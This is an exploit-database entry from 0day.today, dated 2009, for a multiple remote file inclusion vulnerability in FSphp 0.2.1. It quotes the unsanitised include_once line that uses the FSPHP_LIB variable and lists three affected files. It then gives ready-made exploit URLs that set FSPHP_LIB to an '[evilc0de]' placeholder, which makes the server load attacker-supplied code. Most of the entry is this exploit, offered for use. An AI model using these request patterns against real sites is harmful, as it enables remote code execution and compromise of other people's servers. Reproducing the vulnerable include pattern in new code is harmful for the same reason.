FSphp 0.2.1 Remote File Inclusion

2009-09-24T00:00:00
ID 1337DAY-ID-9864
Type zdt
Reporter NoGe
Modified 2009-09-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================
FSphp 0.2.1 Remote File Inclusion
=================================

[o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerability
Software : FSphp version 0.2.1
Vendor   : http://fsphp.sourceforge.net/
Download : http://sourceforge.net/projects/fsphp/
Author   : NoGe
 
[o] Vulnerable file
include_once $FSPHP_LIB . "/path.php" ;
 
lib/FSphp.php
lib/navigation.php
lib/pathwirte.php
 
[o] Exploit
http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]


#  0day.today [2018-03-16]  #